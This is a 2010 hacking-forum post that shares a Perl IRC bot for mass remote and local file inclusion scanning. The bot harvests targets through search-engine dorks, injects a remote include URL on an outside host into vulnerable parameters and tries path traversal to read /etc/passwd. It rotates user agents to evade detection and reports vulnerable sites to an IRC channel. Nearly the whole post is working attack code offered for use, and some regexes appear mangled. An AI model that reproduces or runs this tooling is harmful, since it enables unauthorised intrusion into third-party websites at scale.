Dark Angel Index du Forum
Dark Angel
Hacking and Reverse
 
Dark Angel Index du ForumFAQRechercherS’enregistrerConnexion

:: RFI Scanner ::

 
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> WebApps
Sujet précédent :: Sujet suivant  
Auteur Message
4l3x
Administrateur
Administrateur

Hors ligne

Inscrit le: 04 Nov 2009
Messages: 96

MessagePosté le: Dim 10 Jan - 21:19 (2010)    Sujet du message: RFI Scanner Répondre en citant

#!/usr/bin/perl
##########################################################################################################################
# Modified By : gore
#
#
#
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; PitBull CreW, Mic22, Inphex.
# And also lets just say more version wil come

#
# With this release you must be happy since its the best RFi Scanner around.
# And its even public, happy x-mas !

#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# .scan Bug Dork ( COntone. <Jembik> !scan index.php?page= "index.php?page=" ) Normal RFi Scan
# .lfi Bug Dork ( Contone. <Jembik> !lfi index.php?page= "index.php?page=" ) Normal LFi Scan
#
# ------------- [% Special Commands %] -------------
# .autoscan Bug Dork ( COntone. <Jembik> !autorfiscan index.php?page= "index.php?page=" ) Auto site: Scan
# .autopath Bug Dork ( COntone. <Jembik> !autorfipath page= ) Autopath scan like index.php,home.php,contact.php etc.
# .quit ( COntone. <Jembik> !quit ) make bot leave
# .info ( COntone. <Jembik> !info ) shows info
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
#
###########################################################################################################################

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;

#################
#[Configuration]#
#################
my $response = "http://www.mahbaran.com/load/response.jpg?"; # included in zip
my $test = "http://www.mahbaran.com/load/test.txt?"; # included in zip as test.txt
my $printcmd = "[ucid4]";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://bugdork.wordpress.com?";
my $nickname ="bugdork[".int(rand(5))."]";
my $ident = "bugdork";
my $channel = "#scan";
my $server = "irc.bugdork.net";
my $port = 6667;
#################
#[Configuration]#
#################

my $sock;
my $exploitcounter = 100;
my @User_Agent = &Agent();
my $pid = fork();
if($pid==0){
&connectirc($nickname,$ident,$channel,$server,$port);
}else{
exit(0);
}

sub connectirc(){
my($nickname,$ident,$channel,$server,$port)=@_;
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port);
$sock->autoflush(1);
print $sock "NICK ".$nickname."\r\n";
print $sock "USER ".$ident." 8 * : PitBull CreW\r\n";
print $sock "JOIN ".$channel."\r\n";
while( $command = <$sock> ){

if($command =~ /.scans+(.*?)s+(.*)/){
if(fork() == 0){
my($bug,$dork)=($1,$2);
&scan($bug,$dork);
exit(0);
}
}

if($command =~ /.autoscans+(.*?)s+(.*)/){
if(fork() == 0){
my($bug,$dork)=($1,$2);
&autoscan($bug,$dork);
exit(0);
}
}

if($command =~ /.autopaths+(.*)/){
if(fork() == 0){
my($dork)=($1);
&autopath($dork);
exit(0);
}
}

if($command =~ /.lfis+(.*?)s+(.*)/){
if(fork() == 0){
my($bug,$dork)=($1,$2);
&lfi($bug,$dork);
exit(0);
}
}

if($command =~ /.info/){
&message($channel,"4[Help] 12Public Scanner from -> 2 jembik jembik crew ");
&message($channel,"4[Help] 12Gunakno Command e -> 2 !");
&message($channel,"4[Help] 12Perintah e -> 2 scan <string> <dork> ");
&message($channel,"4[Help] 12Perintah e -> 2 autoscan <string> <dork>k ");
&message($channel,"4[Help] 12perintah e -> 2 autopath <inject> ");
&message($channel,"4[Help] 12perintah e -> 2 lfi <string> <dork> ");
&message($channel,"4[Help] 12perintah e -> 2 quit <ra tak dudoh i ... ben kwapok> ");
&message($channel,"4[Help] 12Selamad Menikmati jok lali lek oleh hasile bagi-bagi coi ... ");
}

if($command =~ /.gore/){
&quit;
exit(0);
}

if($command =~ /.cok/){
exit(0);
}

if($command =~ /^PING Sad.*)/){
print $sock "PONG :$1";
}
}
}

sub scan(){
my($bug,$dork)=@_;
$dork =~ s/[rn]//g;
my $counter = 0;
&message($channel,"4[gore] 12Scanner e wes dimulai mekan -> 2".$dork);
&Find($dork);
&Test($bug);
&message($channel,"4[gore] 12Scanner e wes mari -> 2".$dork);
}

sub lfi(){
my($bug,$dork)=@_;
$dork =~ s/[rn]//g;
my $counter = 0;
&message($channel,"4[gore] 12LFI e wes dimulai mekan -> 2".$dork);
&Find($dork);
&Testlfi($bug);
&message($channel,"4[gore] 12Scanner e wes mari -> 2".$dork);
}

sub autoscan(){
my @domini = &SiteDomains();
my($bug,$dork)=@_;
$dork =~ s/[rn]//g;
&message($channel,"4[+] 12Auto-Dork-Scanner Dimulai -> 2".$dork);
if($dork =~ /site:/){
&message($channel,"4[jembik] 12Wadow bos enenk seng eror ki sajak e");
exit(0);
}
foreach my $Domains(@domini){
my $auto_dork = $dork."+site:".$Domains;
&message($channel,"4[gore] 12Adding AutoDork ->".$auto_dork);
&Find($auto_dork);
&Test($bug);
&message($channel,"4[gore] 12Scanner e wes mari -> 2".$dork);
}
}

sub autopath(){
my @path = &Paths();
my($dork)=@_;
$dork =~ s/[rn]//g;
&message($channel,"4[+] 12Auto-Path-Scanner Dimulai -> 2".$dork);
if($dork =~ /index/){
&message($channel,"4[jembik] 12Wadow bos enenk seng eror ki sajak e");
exit(0);
}
foreach my $pathi(@path){
my $auto_path = $pathi.$dork;
&message($channel,"4[gore] 12Adding AutoPath -> 2 ".$auto_path);
&Find($auto_path);
&Test($auto_path);
&message($channel,"4[gore] 12Scanner Selesai -> 2".auto_path);
}
}

sub Test(){
my $counter = 0;
my $bug = $_[0];
my @links = &GetLink();
my @forks;
my $forked++;
&message($channel,"4[gore] 12Total Sites ->2 ".scalar(@links));
my @uni = &Unique(@links);
&message($channel,"4[gore] 12Cleaned Sites ->2 ".scalar(@uni));
&Remove();
my $testx = scalar(@uni);
my $startx = 0;
foreach my $site (@uni){
$counter++;
my $link = "http://".$site.$bug.$test."?";
my $responser = "http://".$site.$bug.$response."?";
print($link."\n"); # Prints test links in terminal
if($counter %$exploitcounter == 0){
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
$forks[$start--];
$start++;
}
$startx = 0;
}
$forks[$startx]=fork();
if($forks[$startx] == 0){
my $htmlsite = &Query($link,"3");
if($htmlsite =~ /SafemodeOFF/){
my $responsing = &Query($responser,"3");
if($responsing =~ /SafeOFF/){
&message($channel,"4[Hasil] 12Ki temu Vuln e SafeMode 3OFF12 ->2 "."http://".$site.$bug.$printcmd);
}}
elsif($htmlsite =~ /SafemodeON/){
&message($channel,"4[Hasil] 12Ki temu Vuln e SafeMode 4ON12 ->2 "."http://".$site.$bug.$printcmd);
}
exit(0);
}
if($counter %150 == 0){
&message($channel,"4[Loading] 12Exploiting ->2 ".$counter." out of ".$testx);
}
$startx++;
}
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
$forks[$start--];
$start++;
}
}

sub Testlfi(){
my $counter = 0;
my $bug = $_[0];
my @links = &GetLink();
my @forks;
my $forked++;
&message($channel,"4[gore] 12Total Sites ->2 ".scalar(@links));
my @uni = &Unique(@links);
&message($channel,"4[gore] 12Cleaned Sites ->2 ".scalar(@uni));
&Remove();
my $testx = scalar(@uni);
my $startx = 0;
foreach my $site (@uni){
$counter++;
my $link = "http://".$site.$bug.$responselfi;
print($link."\n"); # Prints test links in terminal
if($counter %$exploitcounter == 0){
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
$forks[$start--];
$start++;
}
$startx = 0;
}
$forks[$startx]=fork();
if($forks[$startx] == 0){
my $htmlsite = &Query($link,"3");
if($htmlsite =~ /root:x:/){
&message($channel,"4[start] 12LFI ->2 "."http://".$site.$bug.$printcmdlfi);
}
exit(0);
}
if($counter %150 == 0){
&message($channel,"4[loading] 12Exploiting ->2 ".$counter." out of ".$testx);
}
$startx++;
}
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
$forks[$start--];
$start++;
}
}

sub Find(){
my $dork = $_[0];
my @proc;
$proc[0] = fork();
if($proc[0] == 0){
&message($channel,"4[Start] 12Google ->2 ".scalar(&Google($dork)));
exit;
}
$proc[1] = fork();
if($proc[1] == 0){
&message($channel,"4[Start] 12Yahoo ->2 ".scalar(&Yahoo($dork)));
exit;
}
$proc[2] = fork();
if($proc[2] == 0){
&message($channel,"4[Start] 12AllTheWeb ->2 ".scalar(&Alltheweb($dork)));
exit;
}
$proc[3] = fork();
if($proc[3] == 0){
&message($channel,"4[Start] 12UOL ->2 ".scalar(&UOL($dork)));
exit;
}

waitpid($proc[0],0);
waitpid($proc[1],0);
waitpid($proc[2],0);
waitpid($proc[3],0);
}

sub message(){
my ($who,$what)=@_;
print $sock "PRIVMSG ".$who." :".$what."\r\n";
}

sub Google(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my @dom = &GoogleDomains();
my $file = "google.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
my $Domains = $dom[rand(scalar(@dom))];
$html.=&Query("http://www.google.".$Domains."/search?q=".$dork."&num=".$num."&sa=N&filter=0&start=".$start);
}
while($html =~ m/<h2 class=r>[url=http:\/\/(.+?)\]http://(.+?)</Url>/g){
$1 =~ /yahoo/ || push(@result,&Links($1,$file));
}
return(@result);
}

sub Alltheweb(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my $file = "alltheweb.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://www.alltheweb.com/search?advanced=1&cat=web&type=all&hits=".$num."&ocjp=1&q=".$dork."&o=".$start);
}
while($html =~ m/<span class="resURL\">http:\/\/(.+?)\ /g){
$1 =~ /alltheweb/ || push(@result,&Links($1,$file));
}
return(@result);
}

sub UOL(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=20;
my $max=100*10;
my $file = "UOL.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://busca.uol.com.br/www/index.html?q=".$dork."&start=".$start);
}
while($html =~ m/<a href="http:\/\/([^>\"]*)/g){
$1 =~ /busca|uol|yahoo/ || push(@result,&Links($1,$file));
}
return(@result);
}

sub Query(){
my($link,$timeout)=@_;
my $req=HTTP::Request->new(GET=>$link);
my $ua=LWP::UserAgent->new();
$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
$ua->timeout($timeout);
my $response=$ua->request($req);
return $response->content;
}

sub Key(){
my $key=$_[0];
$key =~ s/ /\+/g;
$key =~ s/:/\%3A/g;
$key =~ s/\//\%2F/g;
$key =~ s/&/\%26/g;
$key =~ s/\"/\%22/g;
$key =~ s/\\/\%5C/g;
$key =~ s/,/\%2C/g;
return $key;
}

sub GetLink(){
my @file = ("google.txt","yahoo.txt","abacho.txt","gigablast.txt","msn.txt","virgilio.txt","seekport.txt","alltheweb.txt","aol.txt","UOL.txt");
my $link;
my @total;
foreach my $n (@file){
open(F,'<',$n);
while($link = <F>){
$link=~s/[\r\n]//g;
push(@total,$link);
}
close(F);
}
return(@total);
}

sub Remove(){
my @file = ("google.txt","yahoo.txt","abacho.txt","gigablast.txt","msn.txt","virgilio.txt","seekport.txt","alltheweb.txt","aol.txt","UOL.txt");
foreach my $n (@file){
system("rm -rf ".$n);
}
}

sub Links(){
my ($link,$file_print) = @_;
$link=~s/http:\/\///g;
my $host = $link;
my $host_dir = $host;
my @links;
$host_dir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host_dir=&End($host_dir);
$host=&End($host);
$link=&End($host);
push(@links,$link,$host,$host_dir);
open($file,'>>',$file_print);
print $file "$linkn$host_dirn$hostn";
close($file);
return @links;
}

sub End(){
$string=$_[0];
$string.="/";
$string=~s/\/\//\//;
while($string=~/\/\//){
$string=~s/\/\//\//;
}
return($string);
}

sub Unique{
my @Unique = ();
my %seen = ();
foreach my $element ( @_ ){
next if $seen{ $element }++;
push @Unique, $element;
}
return @Unique;
}

sub Agent(){
my @ret = (
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
"Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
"Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
"Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
"Microsoft Pocket Internet Explorer/0.6",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
"MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1Wink",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1Wink",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1Wink",
"Advanced Browser (http://www.avantbrowser.com)",
"Avant Browser (http://www.avantbrowser.com)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
"Mozilla/3.0 (OS/2; U)",
"Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
"Mozilla/4.61 (Macintosh; I; PPC)",
"Mozilla/4.61 [en] (OS/2; U)",
"Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
"Mozilla/4.8 [en] (Windows NT 5.0; U)" );
return(@ret);
}

sub GoogleDomains(){
my @ret = (
"ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk","fi","fr","gr","com.hk",
"ie","co.il","it","co.jp","co.kr","lt","lv","nl","com.pa","com.pe","pl","pt","ru","com.sg",
"com.tr","com.tw","com.ua","co.uk","hu"
);
return(@ret);
}

sub SiteDomains(){
my @dom = (
"de","nl","be","dk","sk","com","net","org",
"info","uk","se","it","fr","hu","pl","ru",
"ro","be","cz","edu","jp"
);
}

sub Paths(){
my @path = (
"index.php?","index2.php?","index3.php?","home.php?","menu.php?","file.php?","config.php?","contact.php?","about.php?"
);
}

#sub sitebypass(){
# my $dork=@_;
# $dork=&Key($dork);
# my @site=(
# "at","be","ca","de","fr",
# "it","nl","pl","ru","mx","edu"
# );
#
# my @pids;
# my $i=0;
# foreach my $sites(@site)
# {
# $pids[$i]=fork();
# if($pids[$i]==0)
# {
# my $engine=&engine($dork,$sites);
# exit(0);
# }
# $i++;
# }
# for($i=0;$b<=$i;$b++){
# waitpid($pids[$b],0);
# }
#push(@result, $engine );
#return(@result)
#}


Revenir en haut
Publicité






MessagePosté le: Dim 10 Jan - 21:19 (2010)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> WebApps Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Index | Panneau d’administration | créer forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
HalloweenOclock © theme by larme d'ange 2006
Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com